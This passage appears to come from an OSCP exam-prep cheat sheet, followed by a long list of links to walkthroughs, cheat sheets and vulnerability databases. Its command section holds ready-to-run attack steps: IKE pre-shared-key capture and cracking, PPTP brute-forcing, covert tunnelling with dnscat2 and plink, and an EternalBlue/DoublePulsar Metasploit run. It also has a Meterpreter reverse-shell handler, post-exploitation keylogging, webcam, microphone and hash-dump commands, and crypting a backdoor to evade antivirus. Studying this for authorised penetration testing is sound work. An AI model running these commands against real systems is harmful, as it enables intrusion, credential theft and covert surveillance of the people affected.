`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 ` Use ike-scan to capture the PSK hash:
`ike-scan ike-scan TARGET-IP ike-scan -A TARGET-IP ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP ` Use psk-crack to crack the PSK hash
`psk-crack hash-file.txt pskcrack psk-crack -b 5 TARGET-IPkey psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key psk-crack -d /path/to/dictionary-file TARGET-IP-key`
- PPTP Hacking
NMAP PPTP Fingerprint:
`nmap –Pn -sV -p 1723 TARGET(S) ` PPTP Dictionary Attack
`thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
- Port Forwarding/Redirection
- PuTTY Link tunnel - SSH Tunneling
`plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`
- SSH Pivoting
`ssh -D <local host>:1010 -p 22 user@<remote host>`
- DNS Tunneling
`apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server bundle install`
`ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422`
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
`dnscat --host <dnscat server ip>`
<span id=“_ujpvtdpc9i67” class=“anchor”><span id=“_Toc480741824” class=“anchor”></span></span>The Metasploit Framework
- See [*Metasploit Unleashed
Course*](https://www.offensive-security.com/metasploit-unleashed/) in the Essentials
- Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework) Translate them for use on OSCP LAB or EXAM.
- Metasploit
`systemctl start postgresql`
`systemctl enable postgresql`
- MSF Syntax
`msfconsole `
`msfconsole -q`
`show -h`
`show auxiliary`
`use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass`
`info`
`show options`
`set RHOSTS 192.168.1.1-254 set THREADS 10`
`run`
`exploit`
`search type:auxiliary login`
- Metasploit Database Access
`hosts`
`db_nmap`
`services -p 443`
`services -p 443 --rhosts`
- Staged and Non-staged
- MS 17-010 - EternalBlue
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
`dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit`
2. Download the exploit repostory https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console
I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
`use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.11.1.73 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run`
- Experimenting with Meterpreter
`sysinfo`
`getuid`
`search -f *pass*.txt`
`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
`shell`
`exit`
- Metasploit Exploit Multi Handler
`payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/`
- Building Your Own MSF Module
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb nano crossfire.rb`
- Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service `route` View and modify the routing table `keyscan_start` Start capturing keystrokes `keyscan_stop` Stop capturing keystrokes `screenshot` Grab a screenshot of the interactive desktop `record_mic` Record audio from the default microphone for X seconds `webcam_snap` Take a snapshot from the specified webcam `getsystem` Attempt to elevate your privilege to that of local system. `hashdump` Dumps the contents of the SAM database
- Meterpreter Post Exploitation Features
`background`
<span id=“_51btodqc88s2” class=“anchor”><span id=“_Toc480741825” class=“anchor”></span></span>Bypassing Antivirus Software
- Crypting Known Malware with Software Protectors
`cp /usr/share/windows-binaries/Hyperion-1.0.zip unzip Hyperion-1.0.zip cd Hyperion-1.0/ i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll . cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll . wine hyperion.exe ../backdoor.exe ../crypted.exe`
OSCP Course Review
- Offensive Security’s PWB and OSCP — My Experience
[*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)
- OSCP Journey
[*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
- Down with OSCP
[*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)
- Jolly Frogs - Tech Exams (Very thorough)
[*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)
<span id=“_pxmpirqr11x0” class=“anchor”><span id=“_Toc480741798” class=“anchor”></span></span>OSCP Inspired VMs and Walkthroughs
- [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
[*https://www.root-me.org/*](https://www.root-me.org/)
- Walk through of Tr0ll-1 - Inspired by on the Trolling found in the
OSCP exam [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/) Another walk through for Tr0ll-1 [*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/) Taming the troll - walkthrough [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/) Troll download on Vuln Hub [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
- Sickos - Walkthrough:
[*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/) Sickos - Inspired by Labs in OSCP [*https://www.vulnhub.com/series/*](https://www.vulnhub.com/series/sickos,70/)[sickos](https://www.vulnhub.com/series/sickos,70/)[*,70/*](https://www.vulnhub.com/series/sickos,70/)
- Lord of the Root Walk Through
[*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/) Lord Of The Root: 1.0.1 - Inspired by OSCP [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
- Tr0ll-2 Walk Through
[*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/) Tr0ll-2 [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
<span id=“_kfwx4om2dsj4” class=“anchor”><span id=“_Toc480741799” class=“anchor”></span></span>Cheat Sheets
- Penetration Tools Cheat Sheet
[*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)
- Pen Testing Bookmarks
[*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)
- OSCP Cheatsheets
[*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
- CEH Cheatsheet
[*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
- Net Bios Scan Cheat Sheet
[*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
- Reverse Shell Cheat Sheet
[*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
- NMap Cheat Sheet
[*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)
- Linux Commands Cheat Sheet
[*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)
- Security Hardening CentO 7
[*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)
- MetaSploit Cheatsheet
[*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
- Google Hacking Database:
[*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)
- Windows Assembly Language Mega Primer
[*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)
- Linux Assembly Language Mega Primer
[*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
- Metasploit Cheat Sheet
[*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
- A bit dated but most is still relevant
[*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)
- NetCat
- [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)
- [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)
- [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
- [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
- [*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
- [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
- [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)
Essentials
- Exploit-db
[*https://www.exploit-db.com/*](https://www.exploit-db.com/)
- SecurityFocus - Vulnerability database
[*http://www.securityfocus.com/*](http://www.securityfocus.com/)
- Vuln Hub - Vulnerable by design
[*https://www.vulnhub.com/*](https://www.vulnhub.com/)
- Exploit Exercises
[*https://exploit-exercises.com/*](https://exploit-exercises.com/)
- SecLists - collection of multiple types of lists used during
security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads [*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)
- Security Tube
[*http://www.securitytube.net/*](http://www.securitytube.net/)
- Metasploit Unleashed - free course on how to use Metasploit
[*https://www.offensive-security.com/metasploit-unleashed*](https://www.offensive-security.com/metasploit-unleashed/)*/*
- 0Day Security Enumeration Guide
[*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)
- Github IO Book - Pen Testing Methodology
[*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)
Windows Privledge Escalation
- Fuzzy Security
[*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
- accesschk.exe
https://technet.microsoft.com/en-us/sysinternals/bb664922
- Windows Priv Escalation For Pen Testers
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- Elevating Privileges to Admin and Further
https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
- Transfer files to windows machines
https://blog.netspi.com/15-ways-to-download-a-file/